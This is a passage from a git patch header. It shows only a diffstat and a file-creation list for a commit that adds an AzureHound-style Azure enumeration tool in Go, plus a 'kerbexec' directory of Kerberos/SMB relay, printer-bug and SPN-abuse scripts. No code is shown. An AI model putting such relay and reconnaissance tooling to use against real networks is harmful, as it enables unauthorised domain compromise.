From f599c08a47dbe073451fb9aaf7f501d20936472d Mon Sep 17 00:00:00 2001 From: pxcs Date: Mon, 25 Nov 2024 20:41:52 +0800 Subject: [PATCH] Azure Cloud Testing (Sophy) scg --- .all-contributorsrc | 97 ++ .dockerignore | 2 + .github/workflows/build.yml | 112 ++ .github/workflows/cla.yml | 24 + .github/workflows/jekyll-docker.yml | 20 - .github/workflows/publish.yml | 85 + .idea/.gitignore | 8 + .idea/AzureHound.iml | 9 + .idea/modules.xml | 8 + .idea/vcs.xml | 6 + .licenserc.yaml | 18 + CONTRIBUTORS.md | 32 + Dockerfile | 16 + LICENSE => LICENSE-SEC | 0 LICENSE.md | 676 ++++++++ LICENSE.txt | 201 +++ NOTICE.md | 15 + README.md | 191 ++- azurehound.py | 261 ++++ client/app_role_assignments.go | 43 + client/apps.go | 61 + client/automation_accounts.go | 39 + client/client.go | 232 +++ client/config/config.go | 107 ++ client/container_registries.go | 39 + client/devices.go | 56 + client/function_apps.go | 39 + client/groups.go | 72 + client/keyvaults.go | 42 + client/logic_apps.go | 39 + client/managed_clusters.go | 39 + client/management_groups.go | 52 + client/mocks/client.go | 515 +++++++ client/query/params.go | 170 ++ client/resource_groups.go | 42 + client/rest/client.go | 313 ++++ client/rest/client_test.go | 69 + client/rest/http.go | 135 ++ client/rest/mocks/client.go | 153 ++ client/rest/token.go | 58 + client/rest/utils.go | 152 ++ client/role_assignments.go | 55 + client/roles.go | 39 + client/service_principals.go | 60 + client/storage_accounts.go | 56 + client/subscriptions.go | 38 + client/tenants.go | 72 + client/users.go | 43 + client/virtual_machines.go | 42 + client/vm_scale_sets.go | 39 + client/web_apps.go | 39 + cmd/configure.go | 295 ++++ cmd/install_windows.go | 157 ++ cmd/list-app-owners.go | 116 ++ cmd/list-app-owners_test.go | 91 ++ cmd/list-app-role-assignments.go | 131 ++ cmd/list-apps.go | 91 ++ cmd/list-apps_test.go | 65 + ...ist-automation-account-role-assignments.go | 136 ++ cmd/list-automation-accounts.go | 127 ++ cmd/list-azure-ad.go | 130 ++ cmd/list-azure-rm.go | 251 +++ cmd/list-container-registries.go | 132 ++ ...ist-container-registry-role-assignments.go | 141 ++ cmd/list-device-owners.go | 131 ++ cmd/list-device-owners_test.go | 102 ++ cmd/list-devices.go | 91 ++ cmd/list-devices_test.go | 69 + cmd/list-function-app-role-assignments.go | 136 ++ cmd/list-function-apps.go | 129 ++ cmd/list-group-members.go | 142 ++ cmd/list-group-members_test.go | 102 ++ cmd/list-group-owners.go | 132 ++ cmd/list-group-owners_test.go | 102 ++ cmd/list-groups.go | 92 ++ cmd/list-groups_test.go | 70 + cmd/list-key-vault-access-policies.go | 130 ++ cmd/list-key-vault-access-policies_test.go | 79 + cmd/list-key-vault-contributors.go | 83 + cmd/list-key-vault-contributors_test.go | 73 + cmd/list-key-vault-kvcontributors.go | 83 + cmd/list-key-vault-kvcontributors_test.go | 76 + cmd/list-key-vault-owners.go | 83 + cmd/list-key-vault-owners_test.go | 76 + cmd/list-key-vault-role-assignments.go | 129 ++ cmd/list-key-vault-role-assignments_test.go | 106 ++ cmd/list-key-vault-user-access-admins.go | 83 + cmd/list-key-vault-user-access-admins_test.go | 76 + cmd/list-key-vaults.go | 130 ++ cmd/list-key-vaults_test.go | 109 ++ cmd/list-logic-app-role-assignments.go | 141 ++ cmd/list-logic-apps.go | 136 ++ cmd/list-managed-cluster-role-assignments.go | 141 ++ cmd/list-managed-clusters.go | 131 ++ cmd/list-management-group-descendants.go | 121 ++ cmd/list-management-group-descendants_test.go | 103 ++ cmd/list-management-group-owners.go | 80 + cmd/list-management-group-owners_test.go | 76 + cmd/list-management-group-role-assignments.go | 132 ++ ...-management-group-role-assignments_test.go | 106 ++ ...ist-management-group-user-access-admins.go | 80 + ...anagement-group-user-access-admins_test.go | 76 + cmd/list-management-groups.go | 94 ++ cmd/list-management-groups_test.go | 69 + cmd/list-resource-group-owners.go | 83 + cmd/list-resource-group-owners_test.go | 76 + cmd/list-resource-group-role-assignments.go | 130 ++ ...st-resource-group-role-assignments_test.go | 106 ++ cmd/list-resource-group-user-access-admins.go | 81 + ...-resource-group-user-access-admins_test.go | 76 + cmd/list-resource-groups.go | 127 ++ cmd/list-resource-groups_test.go | 109 ++ cmd/list-role-assignments.go | 136 ++ cmd/list-role-assignments_test.go | 33 + cmd/list-roles.go | 91 ++ cmd/list-roles_test.go | 69 + cmd/list-root.go | 70 + cmd/list-service-principal-owners.go | 132 ++ cmd/list-service-principal-owners_test.go | 102 ++ cmd/list-service-principals.go | 91 ++ cmd/list-service-principals_test.go | 69 + cmd/list-storage-account-role-assignments.go | 136 ++ cmd/list-storage-accounts.go | 127 ++ cmd/list-storage-containers.go | 135 ++ cmd/list-subscription-owners.go | 108 ++ cmd/list-subscription-owners_test.go | 78 + cmd/list-subscription-role-assignments.go | 132 ++ ...list-subscription-role-assignments_test.go | 114 ++ cmd/list-subscription-user-access-admins.go | 109 ++ ...st-subscription-user-access-admins_test.go | 78 + cmd/list-subscriptions.go | 115 ++ cmd/list-subscriptions_test.go | 69 + cmd/list-tenants.go | 104 ++ cmd/list-tenants_test.go | 69 + cmd/list-users.go | 106 ++ cmd/list-users_test.go | 70 + cmd/list-virtual-machine-admin-logins.go | 81 + cmd/list-virtual-machine-admin-logins_test.go | 76 + ...list-virtual-machine-avere-contributors.go | 81 + ...virtual-machine-avere-contributors_test.go | 76 + cmd/list-virtual-machine-contributors.go | 81 + cmd/list-virtual-machine-contributors_test.go | 76 + cmd/list-virtual-machine-owners.go | 81 + cmd/list-virtual-machine-owners_test.go | 76 + cmd/list-virtual-machine-role-assignments.go | 129 ++ ...t-virtual-machine-role-assignments_test.go | 106 ++ ...list-virtual-machine-user-access-admins.go | 81 + ...virtual-machine-user-access-admins_test.go | 76 + cmd/list-virtual-machine-vmcontributors.go | 81 + ...ist-virtual-machine-vmcontributors_test.go | 76 + cmd/list-virtual-machines.go | 127 ++ cmd/list-virtual-machines_test.go | 109 ++ cmd/list-vm-scale-set-role-assignments.go | 141 ++ cmd/list-vm-scale-sets.go | 132 ++ cmd/list-web-app-role-assignments.go | 141 ++ cmd/list-web-apps.go | 134 ++ cmd/root.go | 47 + cmd/start.go | 439 ++++++ cmd/svc_windows.go | 82 + cmd/uninstall_windows.go | 67 + cmd/utils.go | 489 ++++++ config/config.go | 372 +++++ config/internal/config.go | 157 ++ config/internal/config_test.go | 99 ++ config/utils.go | 88 ++ config/utils_test.go | 75 + constants/environments.go | 71 + constants/misc.go | 44 + constants/roles.go | 1370 +++++++++++++++++ enums/accesstype.go | 25 + enums/account_immutability_policy_state.go | 26 + enums/agegroup.go | 26 + enums/allowedcopyscope.go | 25 + enums/auth-method.go | 34 + enums/auto_heal_action_type.go | 26 + enums/automation_account_identity_type.go | 27 + enums/automation_account_state.go | 26 + enums/autoreplystatus.go | 26 + enums/azure_storage_state.go | 27 + enums/azure_storage_type.go | 25 + enums/blob_restore_progress_status.go | 26 + enums/bypassoption.go | 27 + enums/capabiltystatus.go | 37 + enums/client_cert_mode.go | 26 + enums/connection_string_type.go | 34 + enums/consentforminor.go | 31 + enums/createmode.go | 26 + enums/creationtype.go | 35 + enums/dayofweek.go | 30 + enums/deviceprofile.go | 28 + enums/directory_service_options.go | 26 + enums/dns_endpoint_type.go | 25 + enums/encryption_key_source_type.go | 26 + enums/encryption_key_type.go | 25 + enums/endpointconnectionstatus.go | 28 + enums/endpointprovisioningstate.go | 30 + enums/entity.go | 62 + enums/externalaudiencescope.go | 26 + enums/externaluserstate.go | 25 + enums/ftps_state.go | 26 + enums/generic_enabled_disabled.go | 25 + enums/geo_replication_status.go | 26 + enums/groupvisibility.go | 38 + enums/hosttype.go | 25 + enums/hypervgeneration.go | 25 + enums/identity.go | 30 + enums/immutability_policy_state.go | 25 + enums/immutability_policy_update_type.go | 26 + enums/ip_filter_tag.go | 26 + enums/ipallocationmethod.go | 25 + enums/ipsku.go | 25 + enums/ipskutier.go | 25 + enums/key-vault-access-type.go | 34 + enums/kind.go | 83 + enums/lease_duration.go | 25 + enums/lease_state.go | 28 + enums/lease_status.go | 25 + enums/legalagegroup.go | 36 + enums/legalagegrouprule.go | 40 + enums/licenseerror.go | 29 + enums/licenseprocessingstate.go | 27 + enums/licensestate.go | 27 + enums/logic_app_provisioning_state.go | 41 + enums/logic_app_state.go | 29 + enums/maintenanceoperationcode.go | 27 + enums/managed_pipeline_mode.go | 25 + enums/messagedeliveryoptions.go | 26 + enums/migration_state.go | 25 + enums/minimum_tls_version.go | 30 + enums/networkaction.go | 27 + enums/parameter_type.go | 32 + enums/patchstatus.go | 28 + enums/redundancy_mode.go | 28 + enums/relationship.go | 48 + enums/resourcebehavior.go | 39 + enums/resourceprovisioning.go | 28 + enums/routing_choice.go | 25 + enums/ruleprocessingstate.go | 25 + enums/scm_type.go | 37 + enums/serviceprincipaltype.go | 42 + enums/share_permissions.go | 27 + enums/signinaudience.go | 35 + enums/signintype.go | 27 + enums/site_availability_state.go | 26 + enums/site_load_balancing.go | 29 + enums/sku_converstion_status.go | 26 + enums/sku_name.go | 37 + enums/spendinglimit.go | 26 + enums/ssl_state.go | 26 + enums/ssomode.go | 27 + enums/statuslevel.go | 26 + enums/storage_account_access_tier.go | 26 + enums/storage_account_provisioning_state.go | 26 + enums/storage_account_status.go | 25 + enums/storage_container_public_access.go | 26 + enums/storagetype.go | 29 + enums/subscriptionstate.go | 28 + enums/tenantcategory.go | 27 + enums/trusttype.go | 32 + enums/usage_state.go | 25 + enums/vaultprovisioningstate.go | 26 + enums/vaultsku.go | 26 + enums/vmdeleteoption.go | 25 + enums/vmevictionpolicy.go | 25 + enums/vmpriority.go | 26 + go.mod | 43 + go.sum | 827 ++++++++++ internal/utils.go | 19 + kerbexec/__init__.py | 1 + kerbexec/clients/__init__.py | 101 ++ kerbexec/clients/httprelayclient.py | 126 ++ kerbexec/clients/ldaprelayclient.py | 61 + kerbexec/clients/smbrelayclient.py | 415 +++++ kerbexec/exp/addspn.py | 211 +++ kerbexec/exp/dns.py | 610 ++++++++ kerbexec/exp/printerbug.py | 253 +++ kerbexec/krb.gitignore | 5 + kerbexec/servers/__init__.py | 3 + kerbexec/servers/dnsrelayserver.py | 108 ++ kerbexec/servers/httprelayserver.py | 168 ++ kerbexec/servers/smbrelayserver.py | 595 +++++++ kerbexec/utils/__init__.py | 1 + kerbexec/utils/config.py | 57 + kerbexec/utils/kerberos.py | 335 ++++ kerbexec/utils/krbcredccache.py | 66 + kerbexec/utils/spnego.py | 124 ++ logger/eventlog-transport_windows.go | 65 + logger/internal/logger.go | 176 +++ logger/internal/logger_test.go | 135 ++ logger/log.go | 47 + logger/log_windows.go | 69 + logger/utils.go | 56 + main.go | 34 + main_windows.go | 41 + models/app-member.go | 38 + models/app-owner.go | 44 + models/app-role-assignments.go | 28 + models/app.go | 28 + models/automation-account.go | 28 + models/azure-role-assignment.go | 31 + models/azure/access_policy_entry.go | 35 + models/azure/addin.go | 29 + models/azure/additional_capabilities.go | 29 + models/azure/additional_unattend_content.go | 36 + models/azure/alt_security_id.go | 27 + models/azure/api_application.go | 59 + models/azure/app_profile.go | 24 + models/azure/app_role.go | 41 + models/azure/app_role_assignment.go | 39 + models/azure/app_scope.go | 41 + models/azure/application.go | 171 ++ models/azure/assigned_label.go | 31 + models/azure/assigned_license.go | 29 + models/azure/assigned_plan.go | 38 + models/azure/auto_heal_rules.go | 75 + models/azure/automatic_replies_setting.go | 45 + models/azure/automation_account.go | 52 + models/azure/automation_account_properties.go | 34 + .../azure/automation_account_system_data.go | 29 + models/azure/available_patch_summary.go | 51 + ...ure_files_identity_based_authentication.go | 37 + models/azure/azure_storage_info_value.go | 29 + models/azure/billing_profile.go | 40 + models/azure/blob_restore_status.go | 37 + models/azure/boot_diagnostics.go | 27 + .../azure/boot_diagnostics_instance_view.go | 33 + models/azure/capacity_reservation_profile.go | 26 + models/azure/cloning_info.go | 32 + models/azure/common.go | 45 + models/azure/connection_item_properties.go | 31 + models/azure/connection_string_info.go | 26 + models/azure/container_registry.go | 49 + models/azure/data_disk.go | 95 ++ models/azure/datetime_timezone.go | 27 + models/azure/descendant-info.go | 62 + models/azure/device.go | 131 ++ models/azure/diagnostics_profile.go | 27 + models/azure/diff_disk_settings.go | 36 + models/azure/directory_object.go | 31 + models/azure/disk_encryption_set_params.go | 26 + models/azure/disk_encryption_settings.go | 30 + models/azure/disk_instance_view.go | 31 + models/azure/employee_org_data.go | 33 + models/azure/encryption_properties.go | 61 + models/azure/entity.go | 22 + models/azure/extended_location.go | 23 + models/azure/function_app.go | 51 + models/azure/function_app_props.go | 84 + models/azure/geo_replication_stats.go | 26 + models/azure/group.go | 281 ++++ models/azure/hardware_profile.go | 40 + models/azure/hosting_environment_profile.go | 24 + models/azure/hostname_ssl_state.go | 29 + models/azure/image_reference.go | 50 + models/azure/immutability_policy.go | 24 + .../azure/immutability_policy_properties.go | 27 + .../azure/immutable_policy_update_history.go | 31 + models/azure/immutable_storage_account.go | 31 + .../immutable_storage_with_versioning.go | 26 + models/azure/implicit_grant_settings.go | 29 + models/azure/informational_url.go | 37 + models/azure/instance_view_status.go | 37 + models/azure/ip_rule.go | 25 + models/azure/ip_security_restriction.go | 34 + models/azure/key_credential.go | 56 + models/azure/key_value.go | 23 + models/azure/key_vault.go | 58 + models/azure/key_vault_key_ref.go | 27 + models/azure/key_vault_secret_ref.go | 27 + models/azure/keyvault_permissions.go | 33 + .../azure/last_patch_installation_summary.go | 60 + models/azure/license_assignment_state.go | 48 + models/azure/linux_config.go | 36 + models/azure/linux_patch_settings.go | 33 + models/azure/locale_info.go | 27 + models/azure/logic_app.go | 49 + models/azure/logic_app_definition.go | 90 ++ models/azure/logic_app_parameter.go | 55 + models/azure/logic_app_properties.go | 51 + models/azure/logic_app_sku.go | 25 + models/azure/mailbox_settings.go | 48 + models/azure/maintenance_redeploy_status.go | 44 + models/azure/managed_by_tenant.go | 26 + models/azure/managed_cluster.go | 52 + models/azure/managed_cluster_properties.go | 24 + models/azure/managed_disk_params.go | 33 + models/azure/managed_identity.go | 42 + models/azure/management_group.go | 31 + models/azure/management_group_child_info.go | 27 + models/azure/management_group_details.go | 26 + models/azure/management_group_path_elem.go | 23 + models/azure/management_group_props.go | 33 + models/azure/name_value_pair.go | 23 + models/azure/network_interface_ref.go | 26 + .../network_interface_reference_props.go | 28 + models/azure/network_profile.go | 31 + models/azure/network_rule_set.go | 39 + models/azure/object_identity.go | 55 + models/azure/onprem_ext_attributes.go | 48 + models/azure/onprem_provisioning_error.go | 36 + models/azure/optional_claims.go | 59 + models/azure/organization.go | 140 ++ models/azure/os_disk.go | 78 + models/azure/os_profile.go | 80 + models/azure/parent_group_info.go | 24 + models/azure/parental_controls_settings.go | 29 + models/azure/password_credential.go | 47 + models/azure/password_profile.go | 38 + models/azure/permission_scope.go | 67 + models/azure/plan.go | 37 + models/azure/preauthorized_application.go | 31 + models/azure/privacy_profile.go | 32 + models/azure/private_endpoint.go | 23 + models/azure/private_endpoint_connection.go | 28 + .../azure/private_endpoint_connection_item.go | 29 + .../private_endpoint_connection_properties.go | 31 + .../private_endpoint_connection_resource.go | 26 + .../private_link_service_connection_state.go | 32 + models/azure/provisioned_plan.go | 29 + models/azure/public_client_application.go | 26 + models/azure/push_settings.go | 33 + models/azure/required_resource_access.go | 45 + models/azure/resource_group.go | 41 + models/azure/resource_group_props.go | 22 + models/azure/resource_reference.go | 25 + models/azure/role.go | 69 + models/azure/role_assignment.go | 47 + models/azure/role_permission.go | 35 + models/azure/routing_preference.go | 26 + models/azure/saml_sso_settings.go | 24 + models/azure/sas_policy.go | 25 + models/azure/scheduled_events_profile.go | 23 + models/azure/security_profile.go | 35 + models/azure/service_principal.go | 179 +++ models/azure/site_config.go | 152 ++ models/azure/site_machine_key.go | 25 + models/azure/sku.go | 29 + models/azure/slot_swap_status.go | 24 + models/azure/spa_application.go | 25 + models/azure/ssh_config.go | 24 + models/azure/ssh_public_key.go | 30 + models/azure/storage_account.go | 52 + .../storage_account_primary_endpoints.go | 45 + models/azure/storage_account_props.go | 79 + .../storage_account_sku_conversion_status.go | 27 + models/azure/storage_container.go | 65 + models/azure/storage_container_legal_hold.go | 37 + models/azure/storage_container_props.go | 42 + models/azure/storage_profile.go | 34 + models/azure/sub_resource.go | 23 + models/azure/subscription.go | 51 + models/azure/subscription_policies.go | 33 + models/azure/tenant.go | 38 + .../azure/terminate_notification_profile.go | 28 + models/azure/timezone_base.go | 23 + models/azure/uefi_settings.go | 28 + models/azure/unified_role_assignment.go | 76 + models/azure/unified_role_definition.go | 62 + models/azure/unified_role_permission.go | 71 + models/azure/user.go | 467 ++++++ models/azure/user_assigned_identity.go | 23 + models/azure/vault_certificate.go | 44 + models/azure/vault_props.go | 87 ++ models/azure/vault_secret_group.go | 27 + models/azure/verified_domain.go | 36 + models/azure/verified_publisher.go | 31 + models/azure/virtual_application.go | 30 + models/azure/virtual_hard_disk.go | 23 + models/azure/virtual_machine.go | 53 + .../virtual_machine_agent_instance_view.go | 30 + models/azure/virtual_machine_extension.go | 38 + ...machine_extension_handler_instance_view.go | 30 + ...virtual_machine_extension_instance_view.go | 36 + models/azure/virtual_machine_health_status.go | 24 + models/azure/virtual_machine_instance_view.go | 76 + ...irtual_machine_network_interface_config.go | 26 + models/azure/virtual_machine_patch_status.go | 30 + models/azure/virtual_machine_props.go | 50 + models/azure/virtual_network_rule.go | 28 + models/azure/vm_extension_props.go | 59 + models/azure/vm_gallery_app.go | 35 + models/azure/vm_ip_config_props.go | 46 + models/azure/vm_ip_tag.go | 27 + .../vm_network_interface_config_props.go | 49 + .../vm_network_interface_dns_settings.go | 24 + .../azure/vm_network_interface_ip_config.go | 23 + models/azure/vm_public_ip_config.go | 29 + models/azure/vm_public_ip_config_props.go | 43 + models/azure/vm_public_ip_dns_settings.go | 25 + models/azure/vm_public_ip_sku.go | 31 + models/azure/vm_scale_set.go | 51 + models/azure/vm_size_props.go | 32 + models/azure/web_app.go | 50 + models/azure/web_application.go | 35 + models/azure/win_rm_config.go | 24 + models/azure/win_rm_listener.go | 42 + models/azure/windows_config.go | 43 + models/azure/windows_patch_settings.go | 39 + models/azure/working_hours.go | 34 + models/container-registry.go | 28 + models/device-owner.go | 44 + models/device.go | 28 + models/function-app.go | 28 + models/group-member.go | 44 + models/group-owner.go | 44 + models/group.go | 28 + models/ingest-request.go | 29 + models/job.go | 62 + models/key-vault-access-policy.go | 25 + models/key-vault-contributor.go | 30 + models/key-vault-kvcontributor.go | 30 + models/key-vault-owner.go | 30 + models/key-vault-role-assignment.go | 30 + models/key-vault-user-access-admin.go | 30 + models/key-vault.go | 27 + models/logic-app.go | 28 + models/managed-cluster.go | 27 + models/management-group-owner.go | 32 + models/management-group-role-assignment.go | 30 + models/management-group-user-access-admin.go | 32 + models/mgmt-group.go | 28 + models/resource-group-owner.go | 32 + models/resource-group-role-assignment.go | 30 + models/resource-group-user-access-admin.go | 32 + models/resource-group.go | 26 + models/role-assignments.go | 28 + models/role.go | 28 + models/service-principal-owner.go | 44 + models/service-principal.go | 26 + models/storage-account.go | 28 + models/storage-container.go | 29 + models/subscription-owner.go | 30 + models/subscription-role-assignment.go | 30 + models/subscription-user-access-admin.go | 30 + models/subscription.go | 25 + models/task.go | 38 + models/tenant.go | 25 + models/update-client-request.go | 35 + models/user.go | 28 + models/utils.go | 65 + models/utils_test.go | 228 +++ models/virtual-machine-admin-login.go | 30 + models/virtual-machine-avere-contributor.go | 30 + models/virtual-machine-contributor.go | 30 + models/virtual-machine-owner.go | 30 + models/virtual-machine-role-assignment.go | 30 + models/virtual-machine-user-access-admin.go | 30 + models/virtual-machine-vmcontributor.go | 30 + models/virtual-machine.go | 27 + models/vm-scale-set.go | 27 + models/web-app.go | 28 + panicrecovery/panic_recovery.go | 33 + pipeline/pipeline.go | 276 ++++ pipeline/pipeline_test.go | 106 ++ sec.gitignore | 234 +++ sinks/console.go | 31 + sinks/file.go | 64 + test/1.jpg | Bin 612508 -> 0 bytes test/2.jpg | Bin 873959 -> 0 bytes test/3.jpeg | Bin 117049 -> 0 bytes test/4.jpg | Bin 42061 -> 0 bytes test/5.jpg | Bin 96661 -> 0 bytes test/6.jpg | Bin 151714 -> 0 bytes test/SlidesIndex.html | 64 - test/styles.css | 107 -- 565 files changed, 38224 insertions(+), 291 deletions(-) create mode 100644 .all-contributorsrc create mode 100644 .dockerignore create mode 100644 .github/workflows/build.yml create mode 100644 .github/workflows/cla.yml delete mode 100644 .github/workflows/jekyll-docker.yml create mode 100644 .github/workflows/publish.yml create mode 100644 .idea/.gitignore create mode 100644 .idea/AzureHound.iml create mode 100644 .idea/modules.xml create mode 100644 .idea/vcs.xml create mode 100644 .licenserc.yaml create mode 100644 CONTRIBUTORS.md create mode 100644 Dockerfile rename LICENSE => LICENSE-SEC (100%) create mode 100644 LICENSE.md create mode 100644 LICENSE.txt create mode 100644 NOTICE.md create mode 100644 azurehound.py create mode 100644 client/app_role_assignments.go create mode 100644 client/apps.go create mode 100644 client/automation_accounts.go create mode 100644 client/client.go create mode 100644 client/config/config.go create mode 100644 client/container_registries.go create mode 100644 client/devices.go create mode 100644 client/function_apps.go create mode 100644 client/groups.go create mode 100644 client/keyvaults.go create mode 100644 client/logic_apps.go create mode 100644 client/managed_clusters.go create mode 100644 client/management_groups.go create mode 100644 client/mocks/client.go create mode 100644 client/query/params.go create mode 100644 client/resource_groups.go create mode 100644 client/rest/client.go create mode 100644 client/rest/client_test.go create mode 100644 client/rest/http.go create mode 100644 client/rest/mocks/client.go create mode 100644 client/rest/token.go create mode 100644 client/rest/utils.go create mode 100644 client/role_assignments.go create mode 100644 client/roles.go create mode 100644 client/service_principals.go create mode 100644 client/storage_accounts.go create mode 100644 client/subscriptions.go create mode 100644 client/tenants.go create mode 100644 client/users.go create mode 100644 client/virtual_machines.go create mode 100644 client/vm_scale_sets.go create mode 100644 client/web_apps.go create mode 100644 cmd/configure.go create mode 100644 cmd/install_windows.go create mode 100644 cmd/list-app-owners.go create mode 100644 cmd/list-app-owners_test.go create mode 100644 cmd/list-app-role-assignments.go create mode 100644 cmd/list-apps.go create mode 100644 cmd/list-apps_test.go create mode 100644 cmd/list-automation-account-role-assignments.go create mode 100644 cmd/list-automation-accounts.go create mode 100644 cmd/list-azure-ad.go create mode 100644 cmd/list-azure-rm.go create mode 100644 cmd/list-container-registries.go create mode 100644 cmd/list-container-registry-role-assignments.go create mode 100644 cmd/list-device-owners.go create mode 100644 cmd/list-device-owners_test.go create mode 100644 cmd/list-devices.go create mode 100644 cmd/list-devices_test.go create mode 100644 cmd/list-function-app-role-assignments.go create mode 100644 cmd/list-function-apps.go create mode 100644 cmd/list-group-members.go create mode 100644 cmd/list-group-members_test.go create mode 100644 cmd/list-group-owners.go create mode 100644 cmd/list-group-owners_test.go create mode 100644 cmd/list-groups.go create mode 100644 cmd/list-groups_test.go create mode 100644 cmd/list-key-vault-access-policies.go create mode 100644 cmd/list-key-vault-access-policies_test.go create mode 100644 cmd/list-key-vault-contributors.go create mode 100644 cmd/list-key-vault-contributors_test.go create mode 100644 cmd/list-key-vault-kvcontributors.go create mode 100644 cmd/list-key-vault-kvcontributors_test.go create mode 100644 cmd/list-key-vault-owners.go create mode 100644 cmd/list-key-vault-owners_test.go create mode 100644 cmd/list-key-vault-role-assignments.go create mode 100644 cmd/list-key-vault-role-assignments_test.go create mode 100644 cmd/list-key-vault-user-access-admins.go create mode 100644 cmd/list-key-vault-user-access-admins_test.go create mode 100644 cmd/list-key-vaults.go create mode 100644 cmd/list-key-vaults_test.go create mode 100644 cmd/list-logic-app-role-assignments.go create mode 100644 cmd/list-logic-apps.go create mode 100644 cmd/list-managed-cluster-role-assignments.go create mode 100644 cmd/list-managed-clusters.go create mode 100644 cmd/list-management-group-descendants.go create mode 100644 cmd/list-management-group-descendants_test.go create mode 100644 cmd/list-management-group-owners.go create mode 100644 cmd/list-management-group-owners_test.go create mode 100644 cmd/list-management-group-role-assignments.go create mode 100644 cmd/list-management-group-role-assignments_test.go create mode 100644 cmd/list-management-group-user-access-admins.go create mode 100644 cmd/list-management-group-user-access-admins_test.go create mode 100644 cmd/list-management-groups.go create mode 100644 cmd/list-management-groups_test.go create mode 100644 cmd/list-resource-group-owners.go create mode 100644 cmd/list-resource-group-owners_test.go create mode 100644 cmd/list-resource-group-role-assignments.go create mode 100644 cmd/list-resource-group-role-assignments_test.go create mode 100644 cmd/list-resource-group-user-access-admins.go create mode 100644 cmd/list-resource-group-user-access-admins_test.go create mode 100644 cmd/list-resource-groups.go create mode 100644 cmd/list-resource-groups_test.go create mode 100644 cmd/list-role-assignments.go create mode 100644 cmd/list-role-assignments_test.go create mode 100644 cmd/list-roles.go create mode 100644 cmd/list-roles_test.go create mode 100644 cmd/list-root.go create mode 100644 cmd/list-service-principal-owners.go create mode 100644 cmd/list-service-principal-owners_test.go create mode 100644 cmd/list-service-principals.go create mode 100644 cmd/list-service-principals_test.go create mode 100644 cmd/list-storage-account-role-assignments.go create mode 100644 cmd/list-storage-accounts.go create mode 100644 cmd/list-storage-containers.go create mode 100644 cmd/list-subscription-owners.go create mode 100644 cmd/list-subscription-owners_test.go create mode 100644 cmd/list-subscription-role-assignments.go create mode 100644 cmd/list-subscription-role-assignments_test.go create mode 100644 cmd/list-subscription-user-access-admins.go create mode 100644 cmd/list-subscription-user-access-admins_test.go create mode 100644 cmd/list-subscriptions.go create mode 100644 cmd/list-subscriptions_test.go create mode 100644 cmd/list-tenants.go create mode 100644 cmd/list-tenants_test.go create mode 100644 cmd/list-users.go create mode 100644 cmd/list-users_test.go create mode 100644 cmd/list-virtual-machine-admin-logins.go create mode 100644 cmd/list-virtual-machine-admin-logins_test.go create mode 100644 cmd/list-virtual-machine-avere-contributors.go create mode 100644 cmd/list-virtual-machine-avere-contributors_test.go create mode 100644 cmd/list-virtual-machine-contributors.go create mode 100644 cmd/list-virtual-machine-contributors_test.go create mode 100644 cmd/list-virtual-machine-owners.go create mode 100644 cmd/list-virtual-machine-owners_test.go create mode 100644 cmd/list-virtual-machine-role-assignments.go create mode 100644 cmd/list-virtual-machine-role-assignments_test.go create mode 100644 cmd/list-virtual-machine-user-access-admins.go create mode 100644 cmd/list-virtual-machine-user-access-admins_test.go create mode 100644 cmd/list-virtual-machine-vmcontributors.go create mode 100644 cmd/list-virtual-machine-vmcontributors_test.go create mode 100644 cmd/list-virtual-machines.go create mode 100644 cmd/list-virtual-machines_test.go create mode 100644 cmd/list-vm-scale-set-role-assignments.go create mode 100644 cmd/list-vm-scale-sets.go create mode 100644 cmd/list-web-app-role-assignments.go create mode 100644 cmd/list-web-apps.go create mode 100644 cmd/root.go create mode 100644 cmd/start.go create mode 100644 cmd/svc_windows.go create mode 100644 cmd/uninstall_windows.go create mode 100644 cmd/utils.go create mode 100644 config/config.go create mode 100644 config/internal/config.go create mode 100644 config/internal/config_test.go create mode 100644 config/utils.go create mode 100644 config/utils_test.go create mode 100644 constants/environments.go create mode 100644 constants/misc.go create mode 100644 constants/roles.go create mode 100644 enums/accesstype.go create mode 100644 enums/account_immutability_policy_state.go create mode 100644 enums/agegroup.go create mode 100644 enums/allowedcopyscope.go create mode 100644 enums/auth-method.go create mode 100644 enums/auto_heal_action_type.go create mode 100644 enums/automation_account_identity_type.go create mode 100644 enums/automation_account_state.go create mode 100644 enums/autoreplystatus.go create mode 100644 enums/azure_storage_state.go create mode 100644 enums/azure_storage_type.go create mode 100644 enums/blob_restore_progress_status.go create mode 100644 enums/bypassoption.go create mode 100644 enums/capabiltystatus.go create mode 100644 enums/client_cert_mode.go create mode 100644 enums/connection_string_type.go create mode 100644 enums/consentforminor.go create mode 100644 enums/createmode.go create mode 100644 enums/creationtype.go create mode 100644 enums/dayofweek.go create mode 100644 enums/deviceprofile.go create mode 100644 enums/directory_service_options.go create mode 100644 enums/dns_endpoint_type.go create mode 100644 enums/encryption_key_source_type.go create mode 100644 enums/encryption_key_type.go create mode 100644 enums/endpointconnectionstatus.go create mode 100644 enums/endpointprovisioningstate.go create mode 100644 enums/entity.go create mode 100644 enums/externalaudiencescope.go create mode 100644 enums/externaluserstate.go create mode 100644 enums/ftps_state.go create mode 100644 enums/generic_enabled_disabled.go create mode 100644 enums/geo_replication_status.go create mode 100644 enums/groupvisibility.go create mode 100644 enums/hosttype.go create mode 100644 enums/hypervgeneration.go create mode 100644 enums/identity.go create mode 100644 enums/immutability_policy_state.go create mode 100644 enums/immutability_policy_update_type.go create mode 100644 enums/ip_filter_tag.go create mode 100644 enums/ipallocationmethod.go create mode 100644 enums/ipsku.go create mode 100644 enums/ipskutier.go create mode 100644 enums/key-vault-access-type.go create mode 100644 enums/kind.go create mode 100644 enums/lease_duration.go create mode 100644 enums/lease_state.go create mode 100644 enums/lease_status.go create mode 100644 enums/legalagegroup.go create mode 100644 enums/legalagegrouprule.go create mode 100644 enums/licenseerror.go create mode 100644 enums/licenseprocessingstate.go create mode 100644 enums/licensestate.go create mode 100644 enums/logic_app_provisioning_state.go create mode 100644 enums/logic_app_state.go create mode 100644 enums/maintenanceoperationcode.go create mode 100644 enums/managed_pipeline_mode.go create mode 100644 enums/messagedeliveryoptions.go create mode 100644 enums/migration_state.go create mode 100644 enums/minimum_tls_version.go create mode 100644 enums/networkaction.go create mode 100644 enums/parameter_type.go create mode 100644 enums/patchstatus.go create mode 100644 enums/redundancy_mode.go create mode 100644 enums/relationship.go create mode 100644 enums/resourcebehavior.go create mode 100644 enums/resourceprovisioning.go create mode 100644 enums/routing_choice.go create mode 100644 enums/ruleprocessingstate.go create mode 100644 enums/scm_type.go create mode 100644 enums/serviceprincipaltype.go create mode 100644 